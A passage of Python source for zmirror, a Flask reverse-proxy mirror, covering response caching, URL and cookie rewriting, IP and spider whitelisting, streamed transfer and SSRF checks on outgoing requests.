traceback_str=html_escape(traceback.format_exc()) if is_traceback else 'None or not displayed',
dump_file_path=dump_file_path,
version=CONSTS.__VERSION__, official_site=CONSTS.__GITHUB_URL__
)
if not content_only:
return make_response(error_page.encode(), error_code)
else:
return error_page
def generate_304_response(_content_type=None):
""":rtype Response"""
r = Response(content_type=_content_type, status=304)
r.headers.add('X-Cache', 'FileHit-304')
return r
def generate_ip_verify_hash(input_dict):
"""
生成一个标示用户身份的hash
在 human_ip_verification 功能中使用
hash一共14位
hash(前7位+salt) = 后7位 以此来进行验证
:rtype str
"""
strbuff = human_ip_verification_answers_hash_str
for key in input_dict:
strbuff += key + input_dict[key] + str(random.randint(0, 9000000))
input_key_hash = hex(zlib.adler32(strbuff.encode(encoding='utf-8')))[2:]
while len(input_key_hash) < 7:
input_key_hash += '0'
output_hash = hex(zlib.adler32((input_key_hash + human_ip_verification_answers_hash_str).encode(encoding='utf-8')))[2:]
while len(output_hash) < 7:
output_hash += '0'
return input_key_hash + output_hash
@lru_cache(maxsize=1024)
def verify_ip_hash_cookie(hash_cookie_value):
"""
根据cookie中的hash判断是否允许用户访问
在 human_ip_verification 功能中使用
hash一共14位
hash(前7位+salt) = 后7位 以此来进行验证
:type hash_cookie_value: str
:rtype: bool
"""
try:
input_key_hash = hash_cookie_value[:8]
output_hash = hash_cookie_value[8:]
calculated_hash = hex(zlib.adler32(
(input_key_hash + human_ip_verification_answers_hash_str).encode(encoding='utf-8')
))[2:]
if output_hash == calculated_hash:
return True
else:
return False
except:
return False
def update_content_in_local_cache(url, content, method='GET'):
"""更新 local_cache 中缓存的资源, 追加content
在stream模式中使用"""
if local_cache_enable and method == 'GET' and cache.is_cached(url):
info_dict = cache.get_info(url)
resp = cache.get_obj(url)
resp.set_data(content)
# 当存储的资源没有完整的content时, without_content 被设置为true
# 此时该缓存不会生效, 只有当content被添加后, 缓存才会实际生效
# 在stream模式中, 因为是先接收http头, 然后再接收内容, 所以会出现只有头而没有内容的情况
# 此时程序会先将只有头部的响应添加到本地缓存, 在内容实际接收完成后再追加内容
info_dict['without_content'] = False
if verbose_level >= 4: dbgprint('LocalCache_UpdateCache', url, content[:30], len(content))
cache.put_obj(
url,
resp,
obj_size=len(content),
expires=get_expire_from_mime(parse.mime),
last_modified=info_dict.get('last_modified'),
info_dict=info_dict,
)
def put_response_to_local_cache(url, _our_resp, without_content=False):
"""
put our response object(headers included) to local cache
:param without_content: for stream mode use
:param url: client request url
:param _our_resp: our response(flask response object) to client, would be storge
:type url: str
:type _our_resp: Response
:type without_content: bool
"""
# Only cache GET method, and only when remote returns 200(OK) status
if parse.method != 'GET' or _our_resp.status_code != 200:
return
dbgprint('PuttingCache:', url, "without_content:", without_content)
if without_content:
our_resp = copy.copy(_our_resp)
our_resp.response = None # delete iterator
obj_size = 0
else:
our_resp = _our_resp
obj_size = len(parse.remote_response.content)
# requests' header are CaseInsensitive
last_modified = parse.remote_response.headers.get('Last-Modified', None)
cache.put_obj(
url,
our_resp,
expires=get_expire_from_mime(parse.mime),
obj_size=obj_size,
last_modified=last_modified,
info_dict={'without_content': without_content,
'last_modified': last_modified,
},
)
def try_get_cached_response(url, client_header=None):
"""
尝试从本地缓存中取出响应
:param url: real url with query string
:type client_header: dict
:rtype: Union[Response, None]
"""
# Only use cache when client use GET
if local_cache_enable and parse.method == 'GET' and cache.is_cached(url):
if client_header is not None and 'if-modified-since' in client_header and \
cache.is_unchanged(url, client_header.get('if-modified-since', None)):
dbgprint('FileCacheHit-304', url)
return generate_304_response()
else:
cached_info = cache.get_info(url)
if cached_info.get('without_content', True):
# 关于 without_content 的解释, 请看update_content_in_local_cache()函数
return None
# dbgprint('FileCacheHit-200')
resp = cache.get_obj(url)
assert isinstance(resp, Response)
parse.set_extra_resp_header('x-zmirror-cache', 'FileHit')
return resp
else:
return None
def regex_url_reassemble(match_obj):
"""
Reassemble url parts split by the regex.
:param match_obj: match object of stdlib re
:return: re assembled url string (included prefix(url= etc..) and suffix.)
:rtype: str
"""
prefix = get_group('prefix', match_obj)
quote_left = get_group('quote_left', match_obj)
quote_right = get_group('quote_right', match_obj)
path = get_group('path', match_obj)
match_domain = get_group('domain', match_obj)
scheme = get_group('scheme', match_obj)
whole_match_string = match_obj.group()
# dbgprint('prefix', prefix, 'quote_left', quote_left, 'quote_right', quote_right,
# 'path', path, 'match_domain', match_domain, 'scheme', scheme, 'whole', whole_match_string, v=5)
if r"\/" in path or r"\/" in scheme:
require_slash_escape = True
path = path.replace(r"\/", "/")
# domain_and_scheme = domain_and_scheme.replace(r"\/", "/")
else:
require_slash_escape = False
# path must be not blank
if (not path # path is blank
# only url(something) and @import are allowed to be unquoted
or ('url' not in prefix and 'import' not in prefix) and (not quote_left or quote_right == ')')
# for "key":"value" type replace, we must have at least one '/' in url path (for the value to be regard as url)
or (':' in prefix and '/' not in path)
# if we have quote_left, it must equals to the right
or (quote_left and quote_left != quote_right)
# in javascript, those 'path' contains one or only two slash, should not be rewrited (for potential error)
# or (parse.mime == 'application/javascript' and path.count('/') < 2)
# in javascript, we only rewrite those with explicit scheme ones.
# v0.21.10+ in "key":"value" format, we should ignore those path without scheme
or (not scheme and ('javascript' in parse.mime or '"' in prefix))
):
dbgprint('returned_un_touch', whole_match_string, v=5)
return whole_match_string
# v0.19.0+ Automatic Domains Whitelist (Experimental)
if enable_automatic_domains_whitelist:
try_match_and_add_domain_to_rewrite_white_list(match_domain)
# dbgprint(match_obj.groups(), v=5)
domain = match_domain or parse.remote_domain
# dbgprint('rewrite match_obj:', match_obj, 'domain:', domain, v=5)
# skip if the domain are not in our proxy list
if domain not in allowed_domains_set:
# dbgprint('return untouched because domain not match', domain, whole_match_string, v=5)
return match_obj.group() # return raw, do not change
# this resource's absolute url path to the domain root.
# dbgprint('match path', path, "remote path", parse.remote_path, v=5)
path = urljoin(parse.remote_path, path) # type: str
# 在 Python3.5 以前, urljoin无法正确处理如 urljoin("/","../233") 的情况, 需要手动处理一下
if sys.version_info < (3, 5) and "/../" in path:
path = path.replace("/../", "/")
if not path.startswith("/"):
# 当整合后的path不以 / 开头时, 如果当前是主域名, 则不处理, 如果是外部域名则加上 / 前缀
path = "/" + path
# dbgprint('middle path', path, v=5)
if ':' not in parse.remote_domain: # the python's builtin urljoin has a bug, cannot join domain with port correctly
url_no_scheme = urljoin(domain + '/', path.lstrip('/'))
else:
url_no_scheme = domain + '/' + path.lstrip('/')
# dbgprint('url_no_scheme', url_no_scheme, v=5)
# add extdomains prefix in path if need
if domain in external_domains_set:
path = '/extdomains/' + url_no_scheme
# dbgprint('final_path', path, v=5)
if enable_static_resource_CDN and url_no_scheme in url_to_use_cdn:
# dbgprint('We Know:', url_no_scheme, v=5)
_this_url_mime_cdn = url_to_use_cdn[url_no_scheme][0]
else:
# dbgprint('We Don\'t know:', url_no_scheme,v=5)
_this_url_mime_cdn = False
# Apply CDN domain
if _this_url_mime_cdn:
# pick an cdn domain due to the length of url path
# an advantage of choose like this (not randomly), is this can make higher CDN cache hit rate.
# CDN rewrite, rewrite static resources to cdn domains.
# A lot of cases included, the followings are just the most typical examples.
# http(s)://target.com/img/love_lucia.jpg --> http(s)://your.cdn.domains.com/img/love_lucia.jpg
# http://external.com/css/main.css --> http(s)://your.cdn.domains.com/extdomains/external.com/css/main.css
# http://external.pw/css/main.css --> http(s)://your.cdn.domains.com/extdomains/external.pw/css/main.css
replace_to_scheme_domain = my_host_scheme + CDN_domains[zlib.adler32(path.encode()) % cdn_domains_number]
# else: # parse.mime == 'application/javascript':
# replace_to_scheme_domain = '' # Do not use explicit url prefix in js, to prevent potential error
elif not scheme:
replace_to_scheme_domain = ''
elif 'http' not in scheme:
replace_to_scheme_domain = '//' + my_host_name
else:
replace_to_scheme_domain = myurl_prefix
reassembled_url = urljoin(replace_to_scheme_domain, path)
if _this_url_mime_cdn and cdn_redirect_encode_query_str_into_url:
reassembled_url = embed_real_url_to_embedded_url(
reassembled_url,
url_mime=url_to_use_cdn[url_no_scheme][1],
escape_slash=require_slash_escape
)
if require_slash_escape:
reassembled_url = s_esc(reassembled_url)
# reassemble!
# prefix: src= quote_left: "
# path: /extdomains/target.com/foo/bar.js?love=luciaZ
reassembled = prefix + quote_left + reassembled_url + quote_right + get_group('right_suffix', match_obj)
# dbgprint('---------------------', v=5)
return reassembled
@lru_cache(maxsize=256)
def is_ua_in_whitelist(ua_str):
"""
当机器人或蜘蛛的请求被ban时, 检查它是否处在允许的白名单内
被 is_denied_because_of_spider() 调用
:type ua_str: str
"""
ua_str = ua_str.lower()
if global_ua_white_name in ua_str:
return True
for allowed_ua in spider_ua_white_list:
if allowed_ua in ua_str:
return True
return False
@lru_cache(maxsize=256)
def is_denied_because_of_spider(ua_str):
"""检查user-agent是否因为是蜘蛛或机器人而需要ban掉"""
ua_str = ua_str.lower()
if 'spider' in ua_str or 'bot' in ua_str:
if is_ua_in_whitelist(ua_str):
infoprint("A Spider/Bot's access was granted", ua_str)
return False
infoprint('A Spider/Bot was denied, UA is:', ua_str)
return True
else:
return False
def load_ip_whitelist_file():
"""从文件加载ip白名单"""
set_buff = set()
if os.path.exists(zmirror_root(human_ip_verification_whitelist_file_path)):
with open(zmirror_root(human_ip_verification_whitelist_file_path), 'r', encoding='utf-8') as fp:
set_buff.add(fp.readline().strip())
return set_buff
def append_ip_whitelist_file(ip_to_allow):
"""写入ip白名单到文件"""
try:
with open(zmirror_root(human_ip_verification_whitelist_file_path), 'a', encoding='utf-8') as fp:
fp.write(ip_to_allow + '\n')
except: # coverage: exclude
errprint('Unable to write whitelist file')
traceback.print_exc()
def ip_whitelist_add(ip_to_allow, info_record_dict=None):
"""添加ip到白名单, 并写入文件"""
if ip_to_allow in single_ip_allowed_set:
return
dbgprint('ip white added', ip_to_allow, 'info:', info_record_dict)
single_ip_allowed_set.add(ip_to_allow)
is_ip_not_in_allow_range.cache_clear()
append_ip_whitelist_file(ip_to_allow)
# dbgprint(single_ip_allowed_set)
try:
with open(zmirror_root(human_ip_verification_whitelist_log), 'a', encoding='utf-8') as fp:
fp.write(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + " " + ip_to_allow
+ " " + str(request.user_agent)
+ " " + repr(info_record_dict) + "\n")
except: # coverage: exclude
errprint('Unable to write log file', os.path.abspath(human_ip_verification_whitelist_log))
traceback.print_exc()
@lru_cache(maxsize=256)
def is_ip_not_in_allow_range(ip_address):
"""判断ip是否在白名单中"""
if ip_address in single_ip_allowed_set:
return False
ip_address_obj = ipaddress.ip_address(ip_address)
for allowed_network in human_ip_verification_default_whitelist_networks:
if ip_address_obj in allowed_network:
return False
return True
# ########## End utils ###############
# ################# Begin Server Response Handler #################
def preload_streamed_response_content_async(requests_response_obj, buffer_queue):
"""
stream模式下, 预读远程响应的content
:param requests_response_obj:
:type buffer_queue: queue.Queue
"""
for particle_content in requests_response_obj.iter_content(stream_transfer_buffer_size):
try:
buffer_queue.put(particle_content, timeout=10)
except queue.Full: # coverage: exclude
traceback.print_exc()
exit()
if verbose_level >= 3: dbgprint('BufferSize', buffer_queue.qsize())
buffer_queue.put(None, timeout=10)
exit()
def iter_streamed_response_async():
"""异步, 一边读取远程响应, 一边发送给用户"""
total_size = 0
_start_time = time()
_content_buffer = b''
_disable_cache_temporary = False
buffer_queue = queue.Queue(maxsize=stream_transfer_async_preload_max_packages_size)
t = threading.Thread(
target=preload_streamed_response_content_async,
args=(parse.remote_response, buffer_queue),
daemon=True,
)
t.start()
while True:
try:
particle_content = buffer_queue.get(timeout=15)
except queue.Empty: # coverage: exclude
warnprint('WeGotAnSteamTimeout')
traceback.print_exc()
return
buffer_queue.task_done()
if particle_content is not None:
# 由于stream的特性, content会被消耗掉, 所以需要额外储存起来
if local_cache_enable and not _disable_cache_temporary:
if len(_content_buffer) > 8 * 1024 * 1024: # 8MB
_disable_cache_temporary = True
_content_buffer = None
else:
_content_buffer += particle_content
yield particle_content
else:
if parse.url_no_scheme in url_to_use_cdn:
# 更新记录中的响应的长度
url_to_use_cdn[parse.url_no_scheme][2] = len(_content_buffer)
if local_cache_enable and not _disable_cache_temporary:
update_content_in_local_cache(parse.remote_url, _content_buffer,
method=parse.remote_response.request.method)
return
if verbose_level >= 4:
total_size += len(particle_content)
dbgprint('total_size:', total_size, 'total_speed(KB/s):',
total_size / 1024 / (time() - _start_time + 0.000001))
def copy_response(is_streamed=False):
"""
Copy and parse remote server's response headers, generate our flask response object
:type is_streamed: bool
:return: flask response object
:rtype: Response
"""
if is_streamed:
parse.time["req_time_body"] = 0
# 异步传输内容, 不进行任何重写, 返回一个生成器
content = iter_streamed_response_async()
else:
# 如果不是异步传输, 则(可能)进行重写
content, parse.time["req_time_body"] = response_content_rewrite()
dbgprint('RemoteRespHeaders', parse.remote_response.headers)
# 创建基础的Response对象
resp = Response(content, status=parse.remote_response.status_code)
# --------------------- 将远程响应头筛选/重写并复制到我们都响应中 -----------------------
# 筛选远程响应头时采用白名单制, 只有在 `allowed_remote_response_headers` 中的远程响应头才会被发送回浏览器
for header_key in parse.remote_response.headers:
header_key_lower = header_key.lower()
# Add necessary response headers from the origin site, drop other headers
if header_key_lower in allowed_remote_response_headers:
if header_key_lower == 'location':
# 对于重定向的 location 的重写, 改写为zmirror的url
_location = parse.remote_response.headers[header_key]
if custom_text_rewriter_enable:
# location头也会调用自定义重写函数进行重写, 并且有一个特殊的MIME: mwm/headers-location
# 这部分以后可能会单独独立出一个自定义重写函数
_location = custom_response_text_rewriter(_location, 'mwm/headers-location', parse.remote_url)
resp.headers[header_key] = encode_mirror_url(_location)
elif header_key_lower == 'content-type':
# force add utf-8 to content-type if it is text
if is_mime_represents_text(parse.mime) and 'utf-8' not in parse.content_type:
resp.headers[header_key] = parse.mime + '; charset=utf-8'
else:
resp.headers[header_key] = parse.remote_response.headers[header_key]
elif header_key_lower in ('access-control-allow-origin', 'timing-allow-origin'):
if custom_allowed_origin is None:
resp.headers[header_key] = myurl_prefix
elif custom_allowed_origin == '_*_': # coverage: exclude
_origin = request.headers.get('origin') or request.headers.get('Origin') or myurl_prefix
resp.headers[header_key] = _origin
else:
resp.headers[header_key] = custom_allowed_origin
else:
resp.headers[header_key] = parse.remote_response.headers[header_key]
# If we have the Set-Cookie header, we should extract the raw ones
# and then change the cookie domain to our domain
if header_key_lower == 'set-cookie':
for cookie_string in response_cookies_deep_copy():
resp.headers.add('Set-Cookie', response_cookie_rewrite(cookie_string))
dbgprint('OurRespHeaders:\n', resp.headers)
return resp
# noinspection PyProtectedMember
def response_cookies_deep_copy():
"""
It's a BAD hack to get RAW cookies headers, but so far, we don't have better way.
We'd go DEEP inside the urllib's private method to get raw headers
raw_headers example:
[('Cache-Control', 'private'),
('Content-Length', '48234'),
('Content-Type', 'text/html; Charset=utf-8'),
('Server', 'Microsoft-IIS/8.5'),
('Set-Cookie','BoardList=BoardID=Show; expires=Mon, 02-May-2016 16:00:00 GMT; path=/'),
('Set-Cookie','aspsky=abcefgh; expires=Sun, 24-Apr-2016 16:00:00 GMT; path=/; HttpOnly'),
('Set-Cookie', 'ASPSESSIONIDSCSSDSSQ=OGKMLAHDHBFDJCDMGBOAGOMJ; path=/'),
('X-Powered-By', 'ASP.NET'),
('Date', 'Tue, 26 Apr 2016 12:32:40 GMT')]
"""
raw_headers = parse.remote_response.raw._original_response.headers._headers
header_cookies_string_list = []
for name, value in raw_headers:
if name.lower() == 'set-cookie':
if my_host_scheme == 'http://':
value = value.replace('Secure;', '')
value = value.replace(';Secure', ';')
value = value.replace('; Secure', ';')
if 'httponly' in value.lower():
if enable_aggressive_cookies_path_rewrite:
# 暴力cookie path重写, 把所有path都重写为 /
value = regex_cookie_path_rewriter.sub('path=/;', value)
elif enable_aggressive_cookies_path_rewrite is not None:
# 重写HttpOnly Cookies的path到当前url下
# eg(/extdomains/a.foobar.com): path=/verify; -> path=/extdomains/a.foobar.com/verify
if parse.remote_domain not in domain_alias_to_target_set: # do not rewrite main domains
value = regex_cookie_path_rewriter.sub(
'\g<prefix>=/extdomains/' + parse.remote_domain + '\g<path>', value)
header_cookies_string_list.append(value)
return header_cookies_string_list
def response_content_rewrite():
"""
Rewrite requests response's content's url. Auto skip binary (based on MIME).
:return: Tuple[bytes, float]
"""
_start_time = time()
_content = parse.remote_response.content
req_time_body = time() - _start_time
if not is_mime_represents_text(parse.mime):
# simply don't touch binary response content
dbgprint('Binary', parse.content_type)
return _content, req_time_body
# Do text rewrite if remote response is text-like (html, css, js, xml, etc..)
if verbose_level >= 3: dbgprint('Text-like', parse.content_type,
parse.remote_response.text[:15], _content[:15])
# 自己进行编码检测, 因为 requests 内置的编码检测在天朝GBK面前非常弱鸡
encoding = encoding_detect(parse.remote_response.content)
if encoding is not None:
parse.remote_response.encoding = encoding
# simply copy the raw text, for custom rewriter function first.
resp_text = parse.remote_response.text
if developer_string_trace is not None and developer_string_trace in resp_text:
# debug用代码, 对正常运行无任何作用
infoprint('StringTrace: appears in the RAW remote response text, code line no. ', current_line_number())
# try to apply custom rewrite function
if custom_text_rewriter_enable:
resp_text2 = custom_response_text_rewriter(resp_text, parse.mime, parse.remote_url)
if isinstance(resp_text2, str):
resp_text = resp_text2
elif isinstance(resp_text2, tuple) or isinstance(resp_text2, list):
resp_text, is_skip_builtin_rewrite = resp_text2
if is_skip_builtin_rewrite:
infoprint('Skip_builtin_rewrite', request.url)
return resp_text.encode(encoding='utf-8'), req_time_body
if developer_string_trace is not None and developer_string_trace in resp_text:
# debug用代码, 对正常运行无任何作用
infoprint('StringTrace: appears after custom text rewrite, code line no. ', current_line_number())
# then do the normal rewrites
resp_text = response_text_rewrite(resp_text)
if developer_string_trace is not None and developer_string_trace in resp_text:
# debug用代码, 对正常运行无任何作用
infoprint('StringTrace: appears after builtin rewrite, code line no. ', current_line_number())
# 在页面中插入自定义内容
# 详见 default_config.py 的 `Custom Content Injection` 部分
if custom_inject_content and parse.mime == "text/html":
for position, items in custom_inject_content.items(): # 遍历设置中的所有位置
for item in items: # 每个位置中的条目
# 判断正则是否匹配当前url, 不匹配跳过
r = item.get("url_regex")
if r is not None and not r.match(parse.url_no_scheme):
continue
# 将内容插入到html
resp_text = inject_content(position, resp_text, item["content"])
return resp_text.encode(encoding='utf-8'), req_time_body # return bytes
def response_text_basic_rewrite(*args, **kwargs): # coverage: exclude
"""本函数在v0.28.3被移除, 对本函数的调用会被映射出去
如果需要查看本函数代码, 请查看git历史到 v0.28.3 以前
"""
from warnings import warn
warn("This function is deprecated since v0.28.3, use response_text_basic_mirrorlization() instead", DeprecationWarning)
return response_text_basic_mirrorlization(*args, **kwargs)
def response_text_rewrite(resp_text):
"""
rewrite urls in text-like content (html,css,js)
:type resp_text: str
:rtype: str
"""
# v0.20.6+ plain replace domain alias, support json/urlencoded/json-urlencoded/plain
if url_custom_redirect_enable:
for before_replace, after_replace in (plain_replace_domain_alias + parse.temporary_domain_alias):
resp_text = resp_text.replace(before_replace, after_replace)
# v0.9.2+: advanced url rewrite engine
resp_text = regex_adv_url_rewriter.sub(regex_url_reassemble, resp_text)
if developer_string_trace is not None and developer_string_trace in resp_text:
# debug用代码, 对正常运行无任何作用
infoprint('StringTrace: appears after advanced rewrite, code line no. ', current_line_number())
# v0.28.0 实验性功能, 在v0.28.3后默认启用
resp_text = response_text_basic_mirrorlization(resp_text)
if developer_string_trace is not None and developer_string_trace in resp_text:
# debug用代码, 对正常运行无任何作用
infoprint('StringTrace: appears after basic mirrorlization, code line no. ', current_line_number())
# for cookies set string (in js) replace
# eg: ".twitter.com" --> "foo.com"
resp_text = resp_text.replace('\".' + target_domain_root + '\"', '\"' + my_host_name_no_port + '\"')
resp_text = resp_text.replace("\'." + target_domain_root + "\'", "\'" + my_host_name_no_port + "\'")
resp_text = resp_text.replace("domain=." + target_domain_root, "domain=" + my_host_name_no_port)
resp_text = resp_text.replace('\"' + target_domain_root + '\"', '\"' + my_host_name_no_port + '\"')
resp_text = resp_text.replace("\'" + target_domain_root + "\'", "\'" + my_host_name_no_port + "\'")
if developer_string_trace is not None and developer_string_trace in resp_text:
# debug用代码, 对正常运行无任何作用
infoprint('StringTrace: appears after js cookies string rewrite, code line no. ', current_line_number())
# resp_text = resp_text.replace('lang="zh-Hans"', '', 1)
return resp_text
def response_cookie_rewrite(cookie_string):
"""
rewrite response cookie string's domain to `my_host_name`
:type cookie_string: str
"""
cookie_string = regex_cookie_rewriter.sub('domain=' + my_host_name_no_port, cookie_string)
return cookie_string
# ################# End Server Response Handler #################
# ################# Begin Client Request Handler #################
def assemble_remote_url():
"""
组装目标服务器URL, 即生成 parse.remote_url 的值
:rtype: str
"""
if parse.is_external_domain:
# 请求的是外部域名 (external domains)
scheme = 'https://' if parse.is_https else 'http://'
return urljoin(scheme + parse.remote_domain, parse.remote_path_query)
else:
# 请求的是主域名及可以被当做(alias)主域名的域名
return urljoin(target_scheme + target_domain, parse.remote_path_query)
def ssrf_check_layer_1():
"""
SSRF防护, 第一层, 在请求刚开始时被调用, 检查域名是否允许
:return: 如果请求触发了SSRF防护, 则返回True
:rtype: bool
"""
# Only external in-zone domains are allowed (SSRF check layer 1)
if parse.remote_domain not in allowed_domains_set:
if not try_match_and_add_domain_to_rewrite_white_list(parse.remote_domain): # 请求的域名是否满足通配符
if developer_temporary_disable_ssrf_prevention: # 是否在设置中临时关闭了SSRF防护
add_ssrf_allowed_domain(parse.remote_domain)
return False
else:
return True
return False
def extract_client_header():
"""
Extract necessary client header, filter out some.
对于浏览器请求头的策略是黑名单制, 在黑名单中的头会被剔除, 其余所有请求头都会被保留
对于浏览器请求头, zmirror会移除掉其中的 host和content-length
并重写其中的cookie头, 把里面可能存在的本站域名修改为远程服务器的域名
:return: 重写后的请求头
:rtype: dict
"""
rewrited_headers = {}
dbgprint('BrowserRequestHeaders:', request.headers)
for head_name, head_value in request.headers:
head_name_l = head_name.lower() # requests的请求头是区分大小写的, 统一变为小写
# ------------------ 特殊请求头的处理 -------------------
if head_name_l in ('host', 'content-length'):
# 丢弃浏览器的这两个头, 会在zmirror请求时重新生成
continue
elif head_name_l == 'content-type' and head_value == '':
# 跳过请求头中的空白的 content-type
# 在flask的request中, 无论浏览器实际有没有传入, content-type头会始终存在,
# 如果它是空值, 则表示实际上没这个头, 则剔除掉
continue
elif head_name_l == 'accept-encoding' and ('br' in head_value or 'sdch' in head_value):
# 一些现代浏览器支持sdch和br编码, 而requests不支持, 所以会剔除掉请求头中sdch和br编码的标记
# For Firefox, they may send 'Accept-Encoding: gzip, deflate, br'
# For Chrome, they may send 'Accept-Encoding: gzip, deflate, sdch, br'
# however, requests cannot decode the br encode, so we have to remove it from the request header.
_str_buff = ''
if 'gzip' in head_value:
_str_buff += 'gzip, '
if 'deflate' in head_value:
_str_buff += 'deflate'
if _str_buff:
rewrited_headers[head_name_l] = _str_buff
continue
else:
# ------------------ 其他请求头的处理 -------------------
# 对于其他的头, 进行一次内容重写后保留
rewrited_headers[head_name_l] = client_requests_text_rewrite(head_value)
# 移除掉 cookie 中的 zmirror_verify
if head_name_l == "cookie":
rewrited_headers[head_name_l] = regex_remove__zmirror_verify__header.sub(
"",
rewrited_headers[head_name_l],
)
dbgprint('FilteredBrowserRequestHeaders:', rewrited_headers)
return rewrited_headers
# noinspection SpellCheckingInspection
def client_requests_text_rewrite(raw_text):
"""
Rewrite proxy domain to origin domain, extdomains supported.
Also Support urlencoded url.
This usually used in rewriting request params
eg. http://foo.bar/extdomains/accounts.google.com to http://accounts.google.com
eg2. foo.bar/foobar to www.google.com/foobar
eg3. http%3a%2f%2fg.zju.tools%2fextdomains%2Faccounts.google.com%2f233
to http%3a%2f%2faccounts.google.com%2f233
:type raw_text: str
:rtype: str
"""
def replace_to_real_domain(match_obj):
scheme = get_group("scheme", match_obj) # type: str
colon = match_obj.group("colon") # type: str
scheme_slash = get_group("scheme_slash", match_obj) # type: str
_is_https = bool(get_group("is_https", match_obj)) # type: bool
real_domain = match_obj.group("real_domain") # type: str
result = ""
if scheme:
if "http" in scheme:
if _is_https or is_target_domain_use_https(real_domain):
result += "https" + colon
else:
result += "http" + colon
result += scheme_slash * 2
result += real_domain
return result
# 使用一个复杂的正则进行替换, 这次替换以后, 理论上所有 extdomains 都会被剔除
# 详见本文件顶部, regex_request_rewriter_extdomains 本体
replaced = regex_request_rewriter_extdomains.sub(replace_to_real_domain, raw_text)
if developer_string_trace is not None and developer_string_trace in replaced:
# debug用代码, 对正常运行无任何作用
infoprint('StringTrace: appears client_requests_text_rewrite, code line no. ', current_line_number())
# 正则替换掉单独的, 不含 /extdomains/ 的主域名
replaced = regex_request_rewriter_main_domain.sub(target_domain, replaced)
# 为了保险起见, 再进行一次裸的替换
replaced = replaced.replace(my_host_name, target_domain)
dbgprint('ClientRequestedUrl: ', raw_text, '<- Has Been Rewrited To ->', replaced)
return replaced
def extract_url_path_and_query(full_url=None, no_query=False):
"""
Convert http://foo.bar.com/aaa/p.html?x=y to /aaa/p.html?x=y
:param no_query:
:type full_url: str
:param full_url: full url
:return: str
"""
if full_url is None:
full_url = request.url
split = urlsplit(full_url)
result = split.path or "/"
if not no_query and split.query:
result += '?' + split.query
return result
# ################# End Client Request Handler #################
# ################# Begin Middle Functions #################
def send_request(url, method='GET', headers=None, param_get=None, data=None):
"""实际发送请求到目标服务器, 对于重定向, 原样返回给用户
被request_remote_site_and_parse()调用"""
final_hostname = urlsplit(url).netloc
dbgprint('FinalRequestUrl', url, 'FinalHostname', final_hostname)
# Only external in-zone domains are allowed (SSRF check layer 2)
if final_hostname not in allowed_domains_set and not developer_temporary_disable_ssrf_prevention:
raise ConnectionAbortedError('Trying to access an OUT-OF-ZONE domain(SSRF Layer 2):', final_hostname)
# set zero data to None instead of b''
if not data:
data = None
prepped_req = requests.Request(
method,
url,
headers=headers,
params=param_get,
data=data,
).prepare()
# get session
if enable_connection_keep_alive:
_session = connection_pool.get_session(final_hostname)
else:
_session = requests.Session()
# Send real requests
parse.time["req_start_time"] = time()
r = _session.send(
prepped_req,
proxies=requests_proxies,
allow_redirects=False,
stream=enable_stream_content_transfer,
verify=not developer_do_not_verify_ssl,
)
# remote request time
parse.time["req_time_header"] = time() - parse.time["req_start_time"]
dbgprint('RequestTime:', parse.time["req_time_header"], v=4)
# Some debug output
# print(r.request.headers, r.headers)
if verbose_level >= 3:
dbgprint(r.request.method, "FinalSentToRemoteRequestUrl:", r.url, "\nRem Resp Stat: ", r.status_code)
dbgprint("RemoteRequestHeaders: ", r.request.headers)
if data:
dbgprint('RemoteRequestRawData: ', r.request.body)
dbgprint("RemoteResponseHeaders: ", r.headers)
return r
def prepare_client_request_data():
"""
解析出浏览者发送过来的data, 如果是文本, 则进行重写
如果是文本, 则对文本内容进行重写后返回str
如果是二进制则, 则原样返回, 不进行任何处理 (bytes)
:rtype: Union[str, bytes, None]
"""
data = request.get_data() # type: bytes
# 尝试解析浏览器传入的东西的编码
encoding = encoding_detect(data)
if encoding is not None:
try:
data = data.decode(encoding=encoding) # type: str
except:
# 解码失败, data是二进制内容或无法理解的编码, 原样返回, 不进行重写
encoding = None
pass
else:
# data是文本内容, 则进行重写, 并返回str
data = client_requests_text_rewrite(data) # type: str
# 下面这个if是debug用代码, 对正常运行无任何作用
if developer_string_trace: # coverage: exclude
if isinstance(data, str):
data = data.encode(encoding=encoding)
if developer_string_trace.encode(encoding=encoding) in data:
infoprint('StringTrace: appears after client_requests_bin_rewrite, code line no. ', current_line_number())
return data, encoding
def generate_our_response():
"""
生成我们的响应
:rtype: Response
"""
# copy and parse remote response
resp = copy_response(is_streamed=parse.streamed_our_response)
if parse.time["req_time_header"] >= 0.00001:
parse.set_extra_resp_header('X-Header-Req-Time', "%.4f" % parse.time["req_time_header"])
if parse.time.get("start_time") is not None and not parse.streamed_our_response:
# remote request time should be excluded when calculating total time
parse.set_extra_resp_header('X-Body-Req-Time', "%.4f" % parse.time["req_time_body"])
parse.set_extra_resp_header('X-Compute-Time',
"%.4f" % (process_time() - parse.time["start_time"]))
parse.set_extra_resp_header('X-Powered-By', 'zmirror/%s' % CONSTS.__VERSION__)
if developer_dump_all_traffics and not parse.streamed_our_response:
dump_zmirror_snapshot("traffic")
return resp
def parse_remote_response():
"""处理远程服务器的响应"""
# extract response's mime to thread local var
parse.content_type = parse.remote_response.headers.get('Content-Type', '')
parse.mime = extract_mime_from_content_type(parse.content_type)
# only_serve_static_resources
if only_serve_static_resources and not is_content_type_using_cdn(parse.content_type):
return generate_simple_resp_page(b'This site is just for static resources.', error_code=403)
# 是否以stream(流)式传输响应内容
# 关于flask的stream传输, 请看官方文档 http://flask.pocoo.org/docs/0.11/patterns/streaming/
# 如果启用stream传输, 并且响应的mime在启用stream的类型中, 就使用stream传输
# 关于stream模式的更多内容, 请看 config_default.py 中 `enable_stream_content_transfer` 的部分
# 如果你正在用PyCharm, 只需要按住Ctrl然后点下面↓↓这个变量↓↓就行
parse.streamed_our_response = enable_stream_content_transfer and is_mime_streamed(parse.mime)
# extract cache control header, if not cache, we should disable local cache
parse.cache_control = parse.remote_response.headers.get('Cache-Control', '')
# 判断响应是否允许缓存. 使用相当保守的缓存策略
parse.cacheable = 'no-store' not in parse.cache_control and 'must-revalidate' not in parse.cache_control \
and "max-age=0" not in parse.cache_control and "private" not in parse.cache_control \
and parse.remote_response.request.method == 'GET' and parse.remote_response.status_code == 200
if verbose_level >= 4:
dbgprint('Response Content-Type:', parse.content_type,
'IsStreamed:', parse.streamed_our_response,
'cacheable:', parse.cacheable,
'Line', current_line_number(), v=4)
# add url's MIME info to record, for MIME-based CDN rewrite,
# next time we access this url, we would know it's mime
if enable_static_resource_CDN and parse.cacheable:
# we should only cache GET method, and response code is 200
# noinspection PyUnboundLocalVariable
